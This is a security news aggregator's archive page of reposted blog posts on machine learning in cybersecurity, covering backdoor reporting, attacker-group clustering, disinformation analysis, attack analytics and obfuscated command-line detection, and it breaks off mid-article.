Category Archives: machine learning

Orgs Say Yes to AI Use But Ask “What Is It?”

Organizations across the US and Japan have plans to increase their use of artificial intelligence (AI) and machine learning (ML) this year, yet many don’t really understand the technology, according to

The post Orgs Say Yes to AI Use But Ask “What Is It?” appeared first on The Cyber Security Place.

Is AI really intelligent or are its procedures just averagely successful?

Artificial intelligence (AI) and machine learning algorithms such as Deep Learning have become integral parts of our daily lives: they enable digital speech assistants or translation services, improve medical diagnostics and are an indispensable part of future technologies such as autonomous driving. Based on an ever increasing amount of data and powerful novel computer architectures, learning algorithms appear to reach human capabilities, sometimes even excelling beyond. The issue: so far it often remains unknown to … More

The post Is AI really intelligent or are its procedures just averagely successful? appeared first on Help Net Security.

Businesses recognize the need for AI & ML tools in cybersecurity

71 percent of businesses surveyed in the United States plan to use more artificial intelligence and machine learning (AI/ML) in their cybersecurity tools this year, although over half (58%) aren’t sure what that technology

The post Businesses recognize the need for AI & ML tools in cybersecurity appeared first on The Cyber Security Place.

SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack

Security researchers have discovered that the new SLUB backdoor is receiving attack commands from GitHub and relying on Slack for communicating with its attackers.

Trend Micro detailed how this malware campaign began with watering hole attacks that redirected users to webpages hosting malicious code. The campaign proceeded with infection whenever these attacks caught someone with a machine that was not secured from CVE-2018-8174, a VBScript engine vulnerability patched by Microsoft back in May 2018.

Upon exploitation, the attack downloaded a dynamic-link library (DLL) and ran a PowerShell command. This process loaded a downloader that, in turn, downloaded and ran a second executable file containing the SLUB backdoor.

Detected as Backdoor.Win32.SLUB.A, the SLUB backdoor is a threat written in C++ that stands out for two reasons:

  • First, it embeds two authorization tokens to communicate with Slack’s application programming interface (API).
  • Second, it downloads a gist snippet from GitHub and parses it to search for commands.

The backdoor uses these two steps to post the result of its commands in a private Slack channel within a workspace using the embedded tokens. With this flow in place, digital attackers can use SLUB to take screen captures, create archive files and exfiltrate information.

The Ongoing Relevance of Watering Hole Attacks

This campaign isn’t the only recent operation to use watering hole attacks. For example, ESET detected one such campaign in November 2018, in which the OceanLotus group used watering hole attacks to target several websites in Southeast Asia. Several months later, ESET reported that the APT LuckyMouse group had preyed on the International Civil Aviation Organization using a watering hole attack.

These incidents illustrate how watering hole attacks pose an ongoing threat to organizations. Indeed, Carbon Black found that more than one-fifth (21 percent) of financial services companies had recently experienced this type of attack. Threat actors could use a successful attack in those cases to steal money and undermine customer trust in the financial institutions.

How to Defend Against Threats Like the SLUB Backdoor

Security professionals can defend against digital threats like the SLUB backdoor by using a layered security approach. This strategy should include machine learning and threat detection sandboxing to strengthen endpoint defenses against emerging threats, such as fileless malware.

Organizations should also practice risk-based vulnerability management to prioritize the software security flaws they should patch first.

The post SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack appeared first on Security Intelligence.

Going ATOMIC: Clustering and Associating Attacker Activity at Scale

At FireEye, we work hard to detect, track, and stop attackers. As part of this work, we learn a great deal of information about how various attackers operate, including details about commonly used malware, infrastructure, delivery mechanisms, and other tools and techniques. This knowledge is built up over hundreds of investigations and thousands of hours of analysis each year. At the time of publication, we have 50 APT or FIN groups, each of which have distinct characteristics. We have also collected thousands of uncharacterized 'clusters' of related activity about which we have not yet made any formal attribution claims. While unattributed, these clusters are still useful in the sense that they allow us to group and track associated activity over time.

However, as the information we collect grows larger and larger, we realized we needed an algorithmic method to assist in analyzing this information at scale, to discover new potential overlaps and attributions. This blog post will outline the data we used to build the model, the algorithm we developed, and some of the challenges we hope to tackle in the future.

The Data

As we detect and uncover malicious activity, we group forensically-related artifacts into 'clusters'. These clusters indicate actions, infrastructure, and malware that are all part of an intrusion, campaign, or series of activities which have direct links. These are what we call our "UNC" or "uncategorized" groups. Over time, these clusters can grow, merge with other clusters, and potentially 'graduate' into named groups, such as APT33 or FIN7. This graduation occurs only when we understand enough about their operations in each phase of the attack lifecycle and have associated the activity with a state-aligned program or criminal operation.

For every group, we can generate a summary document that contains information broken out into sections such as infrastructure, malware files, communication methods, and other aspects. Figure 1 shows a fabricated example with the various 'topics' broken out. Within each 'topic' – such as 'Malware' – we have various 'terms', which have associated counts. These numbers indicate how often we have recorded a group using that 'term'.


Figure 1: Example group 'documents' demonstrating how data about groups is recorded

The Problem

Our end goal is always to merge a new group either into an existing group once the link can be proven, or to graduate it to its own group if we are confident it represents a new and distinct actor set. These clustering and attribution decisions have thus far been performed manually and require rigorous analysis and justification. However, as we collect increasingly more data about attacker activities, this manual analysis becomes a bottleneck. Clusters risk going unanalyzed, and potential associations and attributions could slip through the cracks. Thus, we now incorporate a machine learning-based model into our intelligence analysis to assist with discovery, analysis, and justification for these claims.

The model we developed began with the following goals:

  1. Create a single, interpretable similarity metric between groups
  2. Evaluate past analytical decisions
  3. Discover new potential matches


Figure 2: Example documents highlighting observed term overlaps between two groups

The Model

This model uses a document clustering approach, familiar in the data science realm and often explained in the context of grouping books or movies. Applying the approach to our structured documents about each group, we can evaluate similarities between groups at scale.

First, we decided to model each topic individually. This decision means that each topic will result in its own measure of similarity between groups, which will ultimately be aggregated to produce a holistic similarity measure.

Here is how we apply this to our documents.

Within each topic, every distinct term is transformed into a value using a method called term frequency -inverse document frequency, or TF-IDF. This transformation is applied to every unique term for every document + topic, and the basic intuition behind it is to:

  1. Increase importance of the term if it occurs often with the document.
  2. Decrease the importance of the term if it appears commonly across all documents.

This approach rewards distinctive terms such as custom malware families – which may appear for only a handful of groups – and down-weights common things such as 'spear-phishing', which appear for the vast majority of groups.

Figure 3 shows an example of TF-IDF being applied to a fictional "UNC599" for two terms: mal.sogu and mal.threebyte. These terms indicate the usages of SOGU and THREEBYTE within the 'malware' topic and thus we calculate their value within that topic using TF-IDF. The first (TF) value is how often those terms appeared as a fraction of all malware terms for the group. The second value (IDF) is the inverse of how frequently those terms appear across all groups. Additionally, we take the natural log of the IDF value, to smooth the effects of highly common terms – as you can see in the graph, when the value is close to 1 (very common terms), the log evaluates to near-zero, thus down-weighting the final TF x IDF value. Unique values have a much higher IDF, and thus result in higher values.


Figure 3: Breakdown of TF-IDF metric when evaluated for a single group in regard to malware

Once each term has been given a score, each group is now reflected as a collection of distinct topics, and each topic is a vector of scores for the terms it contains. Each vector can be conceived as an arrow, detailing the 'direction' that group is 'pointing'within that topic.

Within each topic space, we can then evaluate the similarity of various groups using another method – Cosine Similarity. If, like me, you did not love trigonometry – fear not! The intuition is simple. In essence, this is a measure of how parallel two vectors are. As seen in Figure 4, to evaluate two groups' usage of malware, we plot their malware vectors and see if they are pointing in the same direction. More parallel means they are more similar.


Figure 4: Simplified breakdown of Cosine Similarity metric when applied to two groups in the malware 'space'

One of the nice things about this approach is that large and small vectors are treated the same – thus, a new, relatively small UNC cluster pointing in the same direction as a well-documented APT group will still reflect a high level of similarity. This is one of the primary use cases we have, discovering new clusters of activity with high similarity to already established groups.

Using TF-IDF and Cosine Similarity, we can now calculate the topic-specific similarities for every group in our corpus of documents. The final step is to combine these topic similarities into a single, aggregate metric (Figure 5). This single metric allows us to quickly query our data for 'groups similar to X' or 'similarity between X and Y'. The question then becomes: What is the best way to build this final similarity?


Figure 5: Overall model flow diagram showing individual topic similarities and aggregation in to final similarity matrix

The simplest approach is to take an average, and at first that’s exactly what we did. However, as analysts, this approach did not sync well with analyst intuition. As analysts, we feel that some topics matter more than others. Malware and methodologies should be more important than say, server locations or target industries...right? However, when challenged to provide custom weightings for each topic, it was impossible to find an objective weighting system, free from analyst bias. Finally, we thought: "What if we used existing, known data to tell us what the right weights are?" In order to do that, we needed a lot of known – or "labeled" – examples of both similar and dissimilar groups.

Building a Labeled Dataset

At first our concept seemed straightforward: We would find a large dataset of labeled pairs, and then fit a regression model to accurately classify them. If successful, this model should give us the weights we wanted to discover.

Figure 6 shows some graphical intuition behind this approach. First, using a set of ‘labeled’ pairs, we fit a function which best predicts the data points.


Figure 6: Example Linear regression plot – in reality we used a Logistic Regression, but showing a linear model to demonstrate the intuition

Then, we use that same function to predict the aggregate similarity of un-labeled pairs (Figure 7).


Figure 7: Example of how we used the trained model to predict final similarity from individual topic similarities.

However, our data posed a unique problem in the sense that only a tiny fraction of all potential pairings had ever been analyzed. These analyses happened manually and sporadically, often the result of sudden new information from an investigation finally linking two groups together. As a labeled dataset, these pairs were woefully insufficient for any rigorous evaluation of the approach. We needed more labeled data.

Two of our data scientists suggested a clever approach: What if we created thousands of 'fake' clusters by randomly sampling from well-established APT groups? We could therefore label any two samples that came from the same group as definitely similar, and any two from separate groups as not similar (Figure 8). This gave us the ability to synthetically generate the labeled dataset we desperately needed. Then, using a linear regression model, we were able to elegantly solve this 'weighted average' problem rather than depend on subjective guesses.


Figure 8: Example similarity testing with 'fake' clusters derived from known APT groups

Additionally, these synthetically created clusters gave us a dataset upon which to test various iterations of the model. What if we remove a topic? What if we change the way we capture terms? Using a large labeled dataset, we can now benchmark and evaluate performance as we update and improve the model.

To evaluate the model, we observe several metrics:

  • Recall for synthetic clusters we know come from the same original group – how many do we get right/wrong? This evaluates the accuracy of a given approach.
  • For individual topics, the 'spread' between the calculated similarity of related and unrelated clusters. This helps us identify which topics help separate the classes best.
  • The accuracy of a trained regression model, as a proxy for the 'signal' between similar and dissimilar clusters, as represented by the topics. This can help us identify overfitting issues as well.

Operational Use

In our daily operations, this model serves to augment and assist our intelligence experts. Presenting objective similarities, it can challenge biases and introduce new lines of investigation not previously considered. When dealing with thousands of clusters and new ones added every day from analysts around the globe, even the most seasoned and aware intel analyst could be excused for missing a potential lead. However, our model is able to present probable merges and similarities to analysts on demand, and thus can assist them in discovery.

Upon deploying this to our systems in December 2018, we immediately found benefits. One example is outlined in this blog post about potentially destructive attacks. Since then we have been able to inform, discover, or justify dozens of other merges.

Future Work

Like all models, this one has its weaknesses and we are already working on improvements. There is label noise in the way we manually enter information from investigations. There is sometimes 'extraneous' data about attackers that is not (yet) represented in our documents. Most of all, we have not yet fully incorporated the 'time of activity' and instead rely on 'time of recording'. This introduces a lag in our representation, which makes time-based analysis difficult. What an attacker has done lately should likely mean more than what they did five years ago.

Taking this objective approach and building the model has not only improved our intel operations, but also highlighted data requirements for future modeling efforts. As we have seen in other domains, building a machine learning model on top of forensic data can quickly highlight potential improvements to data modeling, storage, and access. Further information on this model can also be viewed in this video, from a presentation at the 2018 CAMLIS conference.

We have thus far enjoyed taking this approach to augmenting our intelligence model and are excited about the potential paths forward. Most of all, we look forward to the modeling efforts that help us profile, attribute, and stop attackers.

A week in security (March 4 – 11)

Last week, Malwarebytes Labs released its in-depth, international data privacy survey of nearly 4,000 individuals, revealing that every generation, including Millennials, cares about online privacy. We also covered a novel case of zombie email that involved a very much alive account user, delved into the typical data privacy laws a US startup might have to comply with on its journey to success, and spotlighted the Troldesh ransomware, also known as “Shade.”

Other security news

Stay safe, everyone!

The post A week in security (March 4 – 11) appeared first on Malwarebytes Labs.

Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks, (like mapping the time of day that @realDonaldTrump tweets) and then moved onto creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture, that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in-turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

Its not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.

How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications

Attacks on applications can be divided into two types: targeted attacks and “spray and pray” attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization’s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or sold on the dark web. Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack.

One famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability (CVE-2018-7600) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became widely available, which caused the number of attacks on Drupal sites to explode.

The ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.

Identifying Spray and Pray Attacks in Attack Analytics

Attack Analytics, launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.

We recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below.

Figure 1: Attack Analytics Dashboard

Clicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the “How common” filter.

Figure 2: Attack Analytics Many Customers Filter

 

A closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).

Figure 3: Attack Analytics Incident Insights

How Our Algorithm Works

The algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:

  • The attack source: Network source (IP/Subnet), Geographic location
  • The attack target: URL, Host, Parameters
  • The attack time: Duration, Frequency
  • The attack type: Triggered rule
  • The attack tool: Tool name, type & parameters

In some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.

Another significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.

Results and Findings

The Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.

Figure 4: Spray & Pray Incidents Spread

Here’s an interesting example – a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We’ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URLs scan on our customers resources – an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files  on more than 50 different customers with a cURL. And the list goes on.

Focusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers.

Figure 5: Single Source Spray & Pray Accounts Affected

More Actionable Insights Coming

Identifying spray and pray attacks is a great example of using the intelligence from Imperva’s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future.

The post How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications appeared first on Blog.

AI & Your Family: The Wows and Potential Risks

artificial intelligenceAm I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

An there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying on in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of Powershell and Windows command lines respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) have demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion “simple” means generally short and relatively uncomplicated, but can still contain obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produce many boundary cases where simple heuristics to detect if a script is obfuscated (e.g. length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is feasible yet impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as authors evolve to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

